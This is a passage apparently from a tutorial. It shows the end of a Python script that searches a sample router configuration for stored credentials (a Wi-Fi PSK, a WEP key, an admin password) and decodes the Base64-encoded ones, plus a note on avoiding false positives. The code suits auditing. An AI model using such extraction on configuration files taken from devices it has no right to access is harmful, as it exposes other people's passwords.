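  <wlan><ssid>HomeNet</ssid><psk>U3VwZXJTZWNyZXQxMjM=</psk><wepkey>A1B2C3D4E5</wepkey></wlan>
  <admin><login_password>YWRtaW4=</login_password></admin>
</config>"""


if __name__ == "__main__":
    for path, raw, decoded in find_credentials(SAMPLE_CONFIG):
        print(f"{path}: {raw!r} -> {decoded!r}")
```

The printable-text filter is what keeps this from spraying false positives: a hex WEP key happens to match the Base64 alphabet, but its length is not a multiple of four and its "decoding" is binary noise, so it is reported with the raw value and no decoded form, which is the case where the tool's manual Base64 link is the right next step.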